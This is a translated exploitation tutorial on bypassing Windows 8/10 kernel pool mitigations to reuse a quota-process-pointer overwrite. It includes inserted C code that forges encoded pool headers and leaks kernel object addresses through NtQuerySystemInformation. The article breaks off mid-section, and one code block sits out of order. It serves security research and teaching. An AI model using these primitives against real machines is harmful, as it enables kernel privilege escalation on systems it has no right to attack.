Kernel Pool Overflow Exploitation in Practice on Windows 10 - bug warning - the black bar safety net

ID MYHACK58:62201788466
Type myhack58
Reporter Anonymous (佚名)
Modified 2017-08-09T00:00:00


1. Foreword

This is the sequel to the Windows 7 kernel pool overflow exploitation article. Here we achieve the same exploitation on Windows 10, which is more challenging because Microsoft has added many defenses against kernel pool attacks since Windows 8. This article goes deeper into pool internals, so readers are advised to read the first post as background.

1.1 Windows 8 mitigations

Windows 8 introduced a series of security improvements to the pool. This is not an exhaustive list, but the following points matter here:

a. Safe linking/unlinking.
b. PoolIndex validation: the PoolIndex overwrite attack is no longer viable.
c. Non-executable non-paged pool (NonPagedPoolNx): a new non-paged pool type that is not executable; Windows uses it by default instead of the conventional non-paged pool.
d. SMEP (Supervisor Mode Execution Prevention).
e. MIN_MAP_ADDR: the first page of the address space (below 0x1000) is reserved and cannot be allocated, which defends against null-pointer dereference bugs; this protection was already present on Windows 7 and 64-bit Vista.
f. The NtQuerySystemInformation() information leak can no longer be used from low integrity, which is typically the browser sandbox.

As for the quota process pointer overwrite technique used in the previous article:

a. The process pointer is now encoded with a cookie:
   1) In an allocated chunk it is stored as ExpPoolQuotaCookie ^ ChunkAddress ^ ProcessPointer.
   2) When the chunk is free, the process pointer field is used as a canary and holds ExpPoolQuotaCookie ^ ChunkAddress.
b. The decoded process pointer must point into kernel space, otherwise a bug check is triggered.

If you want more detail on the Windows 8 mitigations, read the analysis of Windows 8 heap internals [1]; Tarjei Mandt's other article on Windows 7 kernel pool exploitation [2] describes attack techniques that have each since been effectively mitigated. On Windows 8 there were still usable ways to gain control of RIP through an adjacent object's OBJECT_HEADER, but Windows 10 closed them by encoding the OBJECT_HEADER TypeIndex with a cookie. So, to reuse the quota process pointer overwrite technique from the Windows 7 article, we need:

1. The pool cookie (ExpPoolQuotaCookie): it is required to encode the pointer correctly.
2. The address of the overflowed chunk: it is also part of the encoding.
3. Arbitrary data at a known kernel address: the pointer must not only be correctly encoded and point into kernel space, it must also point to a structure we have faked.

Let's give it a try!

2. Getting the address of the overflowed chunk

This part will be brief, provided you remember the basic pool spraying technique used on Windows 7. Now it is time to scale the trick up: we will use advanced pool spraying, described in the article on Windows kernel pool spraying [3]. With the methods from that article we can predict where any allocation will land. In the case of our IOCTL vulnerability we can easily learn the address of the SystemBuffer allocated by the I/O manager, and since the overflow happens in the SystemBuffer, that is the chunk we overflow, so we have the chunk address.
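To make the three requirements above concrete, here is an added example (not code from the original article) that models the x64 POOL_HEADER and the Windows 8+ ExpPoolQuotaCookie encoding in user mode. The cookie, chunk address and fake-structure address are constructed values, the kernel-space check is reduced to a canonical-address comparison, and nothing touches real kernel memory; the point is to show why a header written the Windows 7 way (raw pointer, no cookie) now fails the decode check while a header built from all three pieces passes it.

```c
/* Added example, not from the article: user-mode model of the x64 POOL_HEADER
 * quota pointer encoding introduced in Windows 8. All addresses are constructed. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define POOL_QUOTA       0x08                   /* PoolType bit: chunk charged to a process quota */
#define KERNEL_BASE_MIN  0xFFFF800000000000ULL  /* lowest canonical kernel-mode address on x64 */

typedef struct {
    uint8_t  PreviousSize;   /* previous chunk size, in 16-byte units */
    uint8_t  PoolIndex;
    uint8_t  BlockSize;      /* this chunk size (header included), in 16-byte units */
    uint8_t  PoolType;       /* pool type plus flag bits such as POOL_QUOTA */
    uint32_t PoolTag;
    uint64_t ProcessBilled;  /* encoded quota process pointer: last 8 bytes of the header */
} POOL_HEADER;               /* 16 bytes on x64 */

/* Encoding used while the chunk is allocated: cookie ^ chunk address ^ process pointer. */
uint64_t encode_quota_pointer(uint64_t cookie, uint64_t chunk, uint64_t process)
{
    return cookie ^ chunk ^ process;
}

/* Value left in the field while the chunk is free (the canary). */
uint64_t free_canary(uint64_t cookie, uint64_t chunk)
{
    return cookie ^ chunk;
}

/* What the kernel recovers from the header when it returns the quota on free. */
uint64_t decode_quota_pointer(const POOL_HEADER *hdr, uint64_t cookie, uint64_t chunk)
{
    return cookie ^ chunk ^ hdr->ProcessBilled;
}

/* The decoded pointer must be a kernel-mode address or the kernel bug checks;
 * this is the check that breaks the plain Windows 7 overwrite. */
bool quota_pointer_plausible(uint64_t decoded)
{
    return decoded >= KERNEL_BASE_MIN;
}

/* Header an attacker writes over the victim chunk so that the kernel decodes
 * `fake_process`, using whatever cookie and chunk address the attacker believes in. */
void forge_quota_header(POOL_HEADER *hdr, uint8_t block_size, uint32_t tag,
                        uint64_t cookie, uint64_t chunk, uint64_t fake_process)
{
    memset(hdr, 0, sizeof *hdr);
    hdr->BlockSize     = block_size;
    hdr->PoolType      = 1 | POOL_QUOTA;   /* PagedPool with the quota bit set */
    hdr->PoolTag       = tag;
    hdr->ProcessBilled = encode_quota_pointer(cookie, chunk, fake_process);
}

/* Simulated free: the pointer the kernel would use, or 0 where it would bug check. */
uint64_t simulate_free(const POOL_HEADER *hdr, uint64_t cookie, uint64_t chunk)
{
    if (!(hdr->PoolType & POOL_QUOTA))
        return 0;                              /* no quota charged, field ignored */
    uint64_t p = decode_quota_pointer(hdr, cookie, chunk);
    return quota_pointer_plausible(p) ? p : 0;
}

/* Full scenario: attacker forges with (attacker_cookie, attacker_chunk), the kernel
 * decodes with the real (cookie, chunk). Returns the accepted pointer or 0. */
uint64_t run_scenario(uint64_t attacker_cookie, uint64_t attacker_chunk,
                      uint64_t cookie, uint64_t chunk, uint64_t fake)
{
    POOL_HEADER hdr;
    forge_quota_header(&hdr, 0x20, 0x6B636148 /* 'Hack' */, attacker_cookie, attacker_chunk, fake);
    return simulate_free(&hdr, cookie, chunk);
}

int main(void)
{
    const uint64_t cookie = 0x5D3A9C1F7E2B4068ULL;  /* stands in for ExpPoolQuotaCookie */
    const uint64_t chunk  = 0xFFFFC90012340000ULL;  /* overflowed chunk, known via spraying */
    const uint64_t fake   = 0xFFFFC90012345000ULL;  /* our fake structure at a known address */

    printf("cookie + chunk known: decoded %#llx\n",
           (unsigned long long)run_scenario(cookie, chunk, cookie, chunk, fake));
    printf("raw pointer, no cookie: decoded %#llx (0 = bug check)\n",
           (unsigned long long)run_scenario(0, 0, cookie, chunk, fake));
    return 0;
}
```

The second scenario is exactly the Windows 7 exploit applied to Windows 8+: the raw fake pointer is XORed with the real cookie and chunk address on free, lands in user space, and the kernel crashes instead of walking our fake structure.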
Note: as mentioned a couple of times already, the NtQuerySystemInformation leak is not usable at low integrity, so we cannot obtain this address from low integrity; medium integrity is the minimum.

3. Getting arbitrary data at a known kernel address

There are several ways to achieve this. For a long time I used pool spraying combined with random IOCTL system calls to store data in freed kernel memory, but this approach is not reliable; since then I found a more reliable method.

The CreatePrivateNamespace function allocates a directory object in the paged pool. Its definition:

    HANDLE WINAPI CreatePrivateNamespace(
      _In_opt_ LPSECURITY_ATTRIBUTES lpPrivateNamespaceAttributes,
      _In_     LPVOID                lpBoundaryDescriptor,
      _In_     LPCTSTR               lpAliasPrefix
    );

What makes it attractive:

1) The function returns a handle, which is normal since it is just an object, but it means we can get the address of the directory object in the paged pool (from the handle, through NtQuerySystemInformation).
2) The second parameter is a boundary descriptor, which must be unique, so it is created with the CreateBoundaryDescriptor function:

a. Function definition:

    HANDLE WINAPI CreateBoundaryDescriptor(
      _In_ LPCTSTR Name,
      _In_ ULONG   Flags
    );

b. Call the function and assign the result to a variable; let's try a "Hello World!".

Key point: the boundary descriptor name is stored directly in the paged pool object, so the following code

[Screenshot: the resulting paged pool chunk]

[Screenshot: the "Hello World!" name stored at offset +0x1A8 of the object; there appears to be no limit on the name length]

[Screenshot: the chunk with a longer boundary descriptor name]

Here the chunk has become twice as large as before, and it is only used to store the boundary descriptor. As a side note, since the size of the object can be controlled, this also makes a powerful paged pool spraying tool. In any case, we are now able to store arbitrary data in kernel space, and we can use the NtQuerySystemInformation leak to get its address.

4. Getting the pool cookie

The atmosphere suddenly got tense. ExpPoolQuotaCookie is a pointer-sized cookie generated by the kernel (8 bytes on 64-bit) with enough entropy that we have no way to guess or compute its value. At first glance the only way to get the pool cookie is a powerful, but rarely available, arbitrary read vulnerability, so I studied how ExpPoolQuotaCookie is used. When a chunk is charged to a process's quota, the PoolType field of its pool header has the quota bit set (PoolQuota, 0x8), and on 64-bit the encoded process pointer is stored in the last 8 bytes of the 16-byte pool header:
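The namespace trick from section 3, as an added example that is not code from the original article: create a boundary descriptor whose name has a chosen length, build the private namespace directory object from it, and recover the object's kernel address from the handle table with NtQuerySystemInformation(SystemExtendedHandleInformation). The two undocumented structures are given with their usual public layout, the alias prefix "PoolExample", the name length 0x200 and the use of the Everyone SID for the boundary are my choices, and the Windows calls are compiled only under _WIN32; the handle-table lookup itself is portable and is exercised against a constructed table elsewhere.

```c
/* Added example, not from the article: controllable paged-pool object via
 * CreateBoundaryDescriptor/CreatePrivateNamespace plus handle-table address leak. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SystemExtendedHandleInformation 64

typedef struct {
    uintptr_t Object;                  /* kernel address of the object body */
    uintptr_t UniqueProcessId;
    uintptr_t HandleValue;
    uint32_t  GrantedAccess;
    uint16_t  CreatorBackTraceIndex;
    uint16_t  ObjectTypeIndex;
    uint32_t  HandleAttributes;
    uint32_t  Reserved;
} HANDLE_ENTRY_EX;                     /* SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX */

typedef struct {
    uintptr_t NumberOfHandles;
    uintptr_t Reserved;
    HANDLE_ENTRY_EX Handles[1];        /* NumberOfHandles entries follow */
} HANDLE_INFO_EX;                      /* SYSTEM_HANDLE_INFORMATION_EX */

/* Address behind (pid, handle), 0 if absent. This is the object body; the
 * OBJECT_HEADER and the POOL_HEADER precede it inside the same chunk. */
uintptr_t find_object_address(const HANDLE_ENTRY_EX *entries, uintptr_t count,
                              uintptr_t pid, uintptr_t handle)
{
    for (uintptr_t i = 0; i < count; i++)
        if (entries[i].UniqueProcessId == pid && entries[i].HandleValue == handle)
            return entries[i].Object;
    return 0;
}

/* Constructed two-entry table standing in for a real dump (not real data). */
const HANDLE_ENTRY_EX SAMPLE_TABLE[2] = {
    { 0xFFFF9A8F12345678ULL, 0x4AC, 0x14, 0, 0, 0, 0, 0 },
    { 0xFFFF9A8F1F000010ULL, 0x4AC, 0xC8, 0, 0, 0, 0, 0 },
};

#ifdef _WIN32
#include <windows.h>
typedef LONG (NTAPI *NtQuerySystemInformation_t)(ULONG, PVOID, ULONG, PULONG);
#define STATUS_INFO_LENGTH_MISMATCH ((LONG)0xC0000004L)

/* Dump the extended handle table, growing the buffer until it fits. */
static HANDLE_INFO_EX *query_handle_table(void)
{
    NtQuerySystemInformation_t NtQSI = (NtQuerySystemInformation_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
    ULONG size = 1 << 20, needed = 0;
    HANDLE_INFO_EX *buf = NULL;
    LONG status;
    if (!NtQSI) return NULL;
    do {
        free(buf);
        if ((buf = malloc(size)) == NULL) return NULL;
        status = NtQSI(SystemExtendedHandleInformation, buf, size, &needed);
        size *= 2;
    } while (status == STATUS_INFO_LENGTH_MISMATCH);
    if (status < 0) { free(buf); return NULL; }
    return buf;
}

/* Boundary name of name_len wide chars (copied into the object, so it sets the
 * chunk size); returns the directory object's kernel address, 0 on failure. */
uintptr_t leak_namespace_object(size_t name_len)
{
    WCHAR *name = calloc(name_len + 1, sizeof(WCHAR));
    BYTE sid[SECURITY_MAX_SID_SIZE];
    DWORD cb = sizeof sid;
    uintptr_t addr = 0;
    if (!name) return 0;
    for (size_t i = 0; i < name_len; i++) name[i] = L'A';
    HANDLE bd = CreateBoundaryDescriptorW(name, 0);
    /* the boundary needs a SID the caller holds; Everyone (S-1-1-0) always is */
    if (bd && CreateWellKnownSid(WinWorldSid, NULL, sid, &cb) && AddSIDToBoundaryDescriptor(&bd, sid)) {
        HANDLE ns = CreatePrivateNamespaceW(NULL, bd, L"PoolExample");
        HANDLE_INFO_EX *tbl = ns ? query_handle_table() : NULL;
        if (tbl) {
            addr = find_object_address(tbl->Handles, tbl->NumberOfHandles,
                                       GetCurrentProcessId(), (uintptr_t)ns);
            free(tbl);
        }
        /* ns is deliberately left open: closing it frees the chunk just located */
    }
    free(name);
    return addr;
}
#endif

int main(void)
{
#ifdef _WIN32
    printf("directory object at %p\n", (void *)leak_namespace_object(0x200));
#else
    printf("object at %#llx\n", (unsigned long long)find_object_address(SAMPLE_TABLE, 2, 0x4AC, 0xC8));
#endif
    return 0;
}
```

The handle must stay open for as long as the fake structure is needed: the directory object, and with it the boundary descriptor name we control, lives exactly as long as the handle, and a freed chunk is the one case in which the address we leaked no longer points at our data.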
